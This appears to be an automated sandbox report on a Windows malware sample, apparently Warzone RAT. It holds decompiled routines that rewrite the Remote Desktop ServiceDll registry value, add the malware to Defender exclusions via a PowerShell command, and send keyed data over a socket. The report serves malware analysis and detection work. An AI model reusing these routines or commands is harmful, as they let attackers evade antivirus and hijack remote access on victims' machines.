                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                      • String ID:
                                      • API String ID: 2744216297-0
                                      • Opcode ID: 4af3bb33e8e6ad2755fb524b03a542392ae39ac864394009ee25d9af0e707ebe
                                      • Instruction ID: 3b404fa4a1b8891bcd12387d267db2ad909e0ae4b04868b85e654aebed86d6c1
                                      • Opcode Fuzzy Hash: 4af3bb33e8e6ad2755fb524b03a542392ae39ac864394009ee25d9af0e707ebe
                                      • Instruction Fuzzy Hash: 51F01C36011219BFCF631F95EC1CA9A3FAAFF497A1F454411FA1885124C632C860EB91
                                      Uniqueness Score: 0.53%

                                      APIs
                                      • _free.LIBCMT ref: 012E59D4
                                        • Part of subcall function 012E628A: HeapFree.KERNEL32(00000000,00000000), ref: 012E62A0
                                        • Part of subcall function 012E628A: GetLastError.KERNEL32(?,?,012E98A8,?,00000000,?,00000000,?,012E98CF,?,00000007,?,?,012E9CD3,?,?), ref: 012E62B2
                                      • _free.LIBCMT ref: 012E59E7
                                      • _free.LIBCMT ref: 012E59F8
                                      • _free.LIBCMT ref: 012E5A09
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 7fb5f461d844d43ae5ee09177f5fdd9205cc51f645f5d71c68dd4a3ca71e6cd2
                                      • Instruction ID: 8fab33af74db4c7a40a280295eedd0eb085f65f8bcc2af09ff54b670ec394131
                                      • Opcode Fuzzy Hash: 7fb5f461d844d43ae5ee09177f5fdd9205cc51f645f5d71c68dd4a3ca71e6cd2
                                      • Instruction Fuzzy Hash: 5BE0B679821161AEC6666F14B9C885B3BAEBB78714F410746E70022318EB3626569F81
                                      Uniqueness Score: 0.03%

                                      APIs
                                      • SetEvent.KERNEL32(?,?,?,?,?), ref: 00261810
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: Event
                                      • String ID: (m&$Dm&
                                      • API String ID: 4201588131-3242779591
                                      • Opcode ID: 852daa7824739dc00518ecd9ff645e4ebc6f0585101ae5829f7014e085589fdc
                                      • Instruction ID: db429648154e98cc8dec1dba80960ea3707f58b5419ce8ed4b55899c4d2f5562
                                      • Opcode Fuzzy Hash: 852daa7824739dc00518ecd9ff645e4ebc6f0585101ae5829f7014e085589fdc
                                      • Instruction Fuzzy Hash: 5C514A35A20107EBCB14DF54E88D96ABBBAFB84300F28C519D85293664CBB1F9F4CB50
                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0025C1A0(void* __edx) {
                                      				// Looks up the ServiceDll value of the TermService (Remote Desktop Services)
                                      				// parameters key, i.e. the path of the DLL that hosts the service, and returns
                                      				// the result of post-processing it.
                                      				void* _v8;
                                      				void* _v12;
                                      				short* _v16;
                                      				int _v20;
                                      				char _v24;
                                      				void* _t28;
                                      				void* _t46;
                                      				int _t48;
                                      
                                      				_t46 = __edx;
                                      				_v8 = 0;
                                      				E00253412( &_v16, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                      				_v24 = 0;
                                      				_v20 = 0;
                                      				// 0x80000002 = HKEY_LOCAL_MACHINE; 0x20119 = KEY_READ | KEY_WOW64_64KEY, so the
                                      				// 32-bit process reads the native 64-bit view of the key.
                                      				if(RegOpenKeyExW(0x80000002, _v16, 0, 0x20119,  &_v8) != 0) {
                                      					L3:
                                      					_t48 = 0;
                                      				} else {
                                      					// RegQueryValueExW of "ServiceDll" (see subcalls below); the value lands in _v24
                                      					_t28 = E0025EF61( &_v8, _t46, E00253412( &_v12, L"ServiceDll"),  &_v24);
                                      					E00255A2D(_v12);
                                      					if(_t28 != 0) {
                                      						// post-processes the value together with the constant 0x267d0c (helper bodies not shown here)
                                      						_t48 = E00253075(E00252D08( &_v24, __eflags,  &_v12), 0x267d0c);
                                      						E00255A2D(_v12);
                                      						_v12 = 0;
                                      					} else {
                                      						E0025EF4C( &_v8);		// RegCloseKey
                                      						goto L3;
                                      					}
                                      				}
                                      				E00252E66( &_v24);
                                      				E00255A2D(_v16);				// VirtualFree of the key-name copy
                                      				E0025EF4C( &_v8);				// RegCloseKey
                                      				return _t48;
                                      			}

                                      APIs
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,00267CD8,?,?,0025C6D5,?,?), ref: 0025C1D2
                                        • Part of subcall function 0025EF61: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,?,00000000,?,?,?,?,0025F3B9,?,0000000A,80000001), ref: 0025EF84
                                        • Part of subcall function 0025EF61: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,?,0025F3B9,?,0000000A,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0025EFA7
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 0025EF4C: RegCloseKey.KERNEL32(?,?,0025F043,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0025EF56
                                      Strings
                                      • ServiceDll, xrefs: 0025C1E0
                                      • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0025C1AD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                      • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                      • API String ID: 1903904756-387424650
                                      • Opcode ID: 82e1a1005492ffcabcd5328d26f48ddee989ee4d159938ea41e36cf84f1dde03
                                      • Instruction ID: 844ba22137dba88c658879f216675a20af09ad79c91bd90fc190e50f4f6576e1
                                      • Opcode Fuzzy Hash: 82e1a1005492ffcabcd5328d26f48ddee989ee4d159938ea41e36cf84f1dde03
                                      • Instruction Fuzzy Hash: 0E114271D20218BBCF14EBE0D9568EEB778AF50752F100155AC02B7192EF709F28DB94
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      C-Code - Quality: 100%
                                      			E0025BD37(void* __ecx, void* __edx) {
                                      				void* _v12;
                                      				void* _v16;
                                      				short* _v20;
                                      				int _v24;
                                      				char _v28;
                                      				char _v36;
                                      				void* _t26;
                                      				void* _t28;
                                      				void* _t43;
                                      				int _t44;
                                      				void* _t45;
                                      
                                      				_t43 = __edx;
                                      				_t45 = __ecx;
                                      				_t44 = 0;
                                      				_v12 = 0;
                                      				E00253412( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                      				_v28 = 0;
                                      				_v24 = 0;
                                      				if(RegOpenKeyExW(0x80000002, _v20, 0, 0x102,  &_v12) == 0) {
                                      					_t26 = E0025304E(_t45 + 0x34, _t43,  &_v36);
                                      					_t28 = E0025EFCB( &_v12, E00253412( &_v16, L"ServiceDll"), _t26, 2);
                                      					E00255A2D(_v16);
                                      					_v16 = 0;
                                      					E00252E66( &_v36);
                                      					E0025EF4C( &_v12);
                                      					if(_t28 != 0) {
                                      						_t44 = 1;
                                      					}
                                      				}
                                      				E00252E66( &_v28);
                                      				E00255A2D(_v20);
                                      				E0025EF4C( &_v12);
                                      				return _t44;
                                      			}














                                      0x0025bd37
                                      0x0025bd3f
                                      0x0025bd41
                                      0x0025bd4b
                                      0x0025bd4e
                                      0x0025bd56
                                      0x0025bd63
                                      0x0025bd73
                                      0x0025bd7e
                                      0x0025bd95
                                      0x0025bd9f
                                      0x0025bda7
                                      0x0025bdaa
                                      0x0025bdb2
                                      0x0025bdb9
                                      0x0025bdbb
                                      0x0025bdbb
                                      0x0025bdb9
                                      0x0025bdbf
                                      0x0025bdc7
                                      0x0025bdcf
                                      0x0025bdd9

                                      APIs
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0025BD6B
                                        • Part of subcall function 0025EFCB: RegSetValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,0025F239,?,00000000,?,00000001,?,?,?), ref: 0025EFEA
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 0025EF4C: RegCloseKey.KERNEL32(?,?,0025F043,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0025EF56
                                      Strings
                                      • ServiceDll, xrefs: 0025BD84
                                      • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0025BD43
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$CloseFreeOpenValueVirtuallstrcpy
                                      • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                      • API String ID: 2854241163-387424650
                                      • Opcode ID: 9b5e96a3e29c1c9c4a3deca6153f4a5281309b3a5d191cd1b88f4dfe3f8d904e
                                      • Instruction ID: 000c146efb20e5a0df3086663adde5f737d4f7fc5fa86e490e52d5197311367a
                                      • Opcode Fuzzy Hash: 9b5e96a3e29c1c9c4a3deca6153f4a5281309b3a5d191cd1b88f4dfe3f8d904e
                                      • Instruction Fuzzy Hash: 0D1173B1D10219ABCB14EB91CC96DEEBB78FF90701F004069EC02B2192EF706B59CE54
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      C-Code - Quality: 100%
                                      			E00260D9D(void* __ecx, void* __eflags) {
                                      				CHAR* _t21;
                                      				CHAR* _t22;
                                      
                                      				_t22 = E002510AD(0x100);
                                      				_t21 = E002510AD(0x100);
                                      				E00251052(_t22, 0, 0x100);
                                      				E00251052(_t21, 0, 0x100);
                                      				GetModuleFileNameA(0, _t22, 0x100);
                                      				E0025102C(_t21, "powershell Add-MpPreference -ExclusionPath ", E002510D5("powershell Add-MpPreference -ExclusionPath "));
                                      				_t1 =  &(_t21[0x2b]); // 0x2b
                                      				E0025102C(_t1, _t22, 3);
                                      				_t2 =  &(_t22[0xff]); // 0xff
                                      				E0025102C(E002510D5(_t21) + _t21, _t2, 1);
                                      				return WinExec(_t21, 0);
                                      			}





                                      0x00260dac
                                      0x00260db7
                                      0x00260db9
                                      0x00260dc2
                                      0x00260dce
                                      0x00260de2
                                      0x00260de9
                                      0x00260dee
                                      0x00260df6
                                      0x00260e09
                                      0x00260e1d

                                      APIs
                                        • Part of subcall function 002510AD: GetProcessHeap.KERNEL32(00000000,00000000,0025F750,00000800,00000000,00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000), ref: 002510B3
                                        • Part of subcall function 002510AD: HeapAlloc.KERNEL32(00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000,?,?,?,00000000), ref: 002510BA
                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000100,?,?,?,?,?,?,00000000,0026131C), ref: 00260DCE
                                      • WinExec.KERNEL32(00000000,00000000), ref: 00260E14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocExecFileModuleNameProcess
                                      • String ID: powershell Add-MpPreference -ExclusionPath
                                      • API String ID: 1018710590-2194938034
                                      • Opcode ID: 1dc8f3a16d1a61b4c5e7ca00983f8e072c91755b54c2d457486c660ceb56d56f
                                      • Instruction ID: 253fff07a9c40cc97774926f39d6ce001cfcf42e13623ea76475d0017d434354
                                      • Opcode Fuzzy Hash: 1dc8f3a16d1a61b4c5e7ca00983f8e072c91755b54c2d457486c660ceb56d56f
                                      • Instruction Fuzzy Hash: DBF096F19602507AE53032719CCFFBB265CDF89762F140425FE04A21C3DAB89CB94A79
                                      Uniqueness

                                      Uniqueness Score: 37.75%

                                      C-Code - Quality: 86%
                                      			E0025515A(void* __ecx, void* __edx, intOrPtr _a4) {
                                      				char _v12;
                                      				char _v16;
                                      				char _v24;
                                      				void* _t21;
                                      				void* _t38;
                                      				intOrPtr _t39;
                                      				void* _t40;
                                      
                                      				_t37 = __edx;
                                      				_t38 = __ecx;
                                      				if( *((intOrPtr*)(__ecx + 0xc)) != 0xffffffff) {
                                      					E00252E33( &_v24, __edx, E002531EC( &_v12, "warzone160"));
                                      					_t31 = _v12;
                                      					E00255A2D(_v12);
                                      					_t39 = _a4;
                                      					_t32 = _t40;
                                      					E00252E79(_t40, _t39);
                                      					E00252E79(_t40,  &_v24);
                                      					_t7 =  &_v16; // 0x254b71
                                      					_t21 = E00255C32(_t7, _t37, _t40, _t32, _v12, _t31);
                                      					_t9 =  &_v16; // 0x254b71
                                      					_t10 = _t38 + 0xc; // 0x2619af
                                      					__imp__#19( *_t10,  *_t9,  *((intOrPtr*)(_t39 + 4)), 0);
                                      					E00252E66( &_v16);
                                      					E00252E66( &_v24);
                                      					return 0 | _t21 != 0xffffffff;
                                      				}
                                      				return 0;
                                      			}










                                      0x0025515a
                                      0x00255163
                                      0x00255169
                                      0x00255180
                                      0x00255185
                                      0x00255188
                                      0x0025518d
                                      0x00255192
                                      0x00255195
                                      0x002551a2
                                      0x002551a7
                                      0x002551aa
                                      0x002551b7
                                      0x002551ba
                                      0x002551bd
                                      0x002551ce
                                      0x002551d6
                                      0x00000000
                                      0x002551db
                                      0x00000000

                                      APIs
                                      • send.WS2_32(002619AF,qK%,?,00000000), ref: 002551BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: send
                                      • String ID: qK%$warzone160
                                      • API String ID: 2809346765-3936098851
                                      • Opcode ID: e8c69a3ad72b9a4d9d5441b5d8ecff3427d8e93051a6c9f0eb8284785881ade6
                                      • Instruction ID: 8a783f6b18e27f30dfdb84e2d0ce099e44050d4fada1a0a1c0f076ed7df94b47
                                      • Opcode Fuzzy Hash: e8c69a3ad72b9a4d9d5441b5d8ecff3427d8e93051a6c9f0eb8284785881ade6
                                      • Instruction Fuzzy Hash: F7019B71530415BBC704E7A4DC53DDEB768DF11362B104229F912620D1EB70BE2D8AA4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E00260164(void* __eflags, intOrPtr _a4, signed int _a8) {
                                      				signed int _t10;
                                      				void* _t11;
                                      
                                      				E0025E20D(0x266d74);
                                      				if( *0x266d70 == 0) {
                                      					_t10 =  *0x266d6c; // 0x3c0a58
                                      					if(_t10 == 0) {
                                      						_t11 = 0x38;
                                      						if(E00255ADB(_t11) == 0) {
                                      							_t10 = 0;
                                      						} else {
                                      							_t10 = E00260C9A(_t7, _t11);
                                      						}
                                      						 *0x266d6c = _t10;
                                      					}
                                      					 *0x266d68 = _a4;
                                      					 *0x266d70 = 1;
                                      					E00260AD0(_t10, _a8);
                                      				}
                                      				return ReleaseMutex( *0x266d74);
                                      			}





                                      0x0026016c
                                      0x00260178
                                      0x0026017a
                                      0x00260182
                                      0x00260186
                                      0x0026018e
                                      0x0026019c
                                      0x00260190
                                      0x00260198
                                      0x00260198
                                      0x0026019e
                                      0x0026019e
                                      0x002601aa
                                      0x002601af
                                      0x002601b9
                                      0x002601b9
                                      0x002601cb

                                      APIs
                                        • Part of subcall function 0025E20D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0025E211
                                      • ReleaseMutex.KERNEL32(?,00254970,?,?), ref: 002601C4
                                        • Part of subcall function 00255ADB: GetProcessHeap.KERNEL32(00000000,000000F4,0025E415,?,?,00000000,002555C4,?,?,00000000), ref: 00255ADE
                                        • Part of subcall function 00255ADB: HeapAlloc.KERNEL32(00000000,?,00000000,002555C4,?,?,00000000), ref: 00255AE5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocMutexObjectProcessReleaseSingleWait
                                      • String ID: X<$tm&
                                      • API String ID: 3462506114-921331389
                                      • Opcode ID: 42452f3f3bdf88405bc805344189bbf8616358edea32211509ce2a8ccec81056
                                      • Instruction ID: 208acc0a9facaebfd0e5aa5f7e5159db278d5a939d86706939584a718c118e0b
                                      • Opcode Fuzzy Hash: 42452f3f3bdf88405bc805344189bbf8616358edea32211509ce2a8ccec81056
                                      • Instruction Fuzzy Hash: 37F0BE707202049BCF18AF64FC5D72A3BA5AB45340F10816AF80AC22A1DFB188A0EE95
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0026012D(void* __eflags) {
                                      				intOrPtr _t5;
                                      
                                      				E0025E20D(0x266d74);
                                      				if( *0x266d70 != 0) {
                                      					_t5 =  *0x266d6c; // 0x3c0a58
                                      					if(_t5 != 0) {
                                      						E00260A57(_t5, _t5);
                                      						 *0x266d70 =  *0x266d70 & 0x00000000;
                                      					}
                                      				}
                                      				return ReleaseMutex( *0x266d74);
                                      			}




                                      0x00260132
                                      0x0026013e
                                      0x00260140
                                      0x00260148
                                      0x0026014b
                                      0x00260150
                                      0x00260150
                                      0x00260148
                                      0x00260163

                                      APIs
                                        • Part of subcall function 0025E20D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0025E211
                                      • ReleaseMutex.KERNEL32(00254962), ref: 0026015D
                                        • Part of subcall function 00260A57: OleUninitialize.OLE32 ref: 00260AC5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MutexObjectReleaseSingleUninitializeWait
                                      • String ID: X<$tm&
                                      • API String ID: 2317507087-921331389
                                      • Opcode ID: 9643c3d5976491f6d555562ceeaf406877aa0623ca72e1408554baa093ac0290
                                      • Instruction ID: d99bdb7859f710e243e6802061ca7aebe1007a252dd047a3e1b73dc9b4c7b26d
                                      • Opcode Fuzzy Hash: 9643c3d5976491f6d555562ceeaf406877aa0623ca72e1408554baa093ac0290
                                      • Instruction Fuzzy Hash: 1BD05EB4320501CBCF2A5B20FC4D7293B31BB01306F00C259D105501B0CBB108A4DA02
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0025FBFC() {
                                      				struct HWND__* _t1;
                                      				void* _t4;
                                      				struct HWND__* _t5;
                                      
                                      				_t1 = E0025FA9F(_t4);
                                      				_t5 = _t1;
                                      				if(_t5 == 0) {
                                      					MessageBoxA(_t1, "Settings not found !", "DEBUG", _t1);
                                      				}
                                      				return _t5;
                                      			}






                                      0x0025fbfd
                                      0x0025fc02
                                      0x0025fc06
                                      0x0025fc14
                                      0x0025fc14
                                      0x0025fc1d

                                      APIs
                                      • MessageBoxA.USER32(00000000,Settings not found !,DEBUG,00000000), ref: 0025FC14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message
                                      • String ID: DEBUG$Settings not found !
                                      • API String ID: 2030045667-2996925740
                                      • Opcode ID: 7af2cbdaa0790626d3d29c549ed81c1b1fd24f9708cf8622444f9b01b9d113f1
                                      • Instruction ID: 9a1fc0999f391e5148b6bb00bb2470bd488f1e92446470f31710d589cd4c67b4
                                      • Opcode Fuzzy Hash: 7af2cbdaa0790626d3d29c549ed81c1b1fd24f9708cf8622444f9b01b9d113f1
                                      • Instruction Fuzzy Hash: 5BC08C22AA0A336B06A33A643E09C6A450C4A22B533010030FC80E7242C664CCA801D8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Execution Graph

                                      Execution Coverage:5%
                                      Dynamic/Decrypted Code Coverage:61.6%
                                      Signature Coverage:3%
                                      Total number of Nodes:987
                                      Total number of Limit Nodes:36

                                      Graph

execution_graph

                                      Executed Functions

                                      Control-flow Graph

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00CD0BBA,00003000,00000004), ref: 00CD7B75
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: In 2010 the government approved a 3.4 billion settlement for the trust case Major portions of the settlement were to partially compensate individual account holders and to buy back fractionated land interests and restore land to 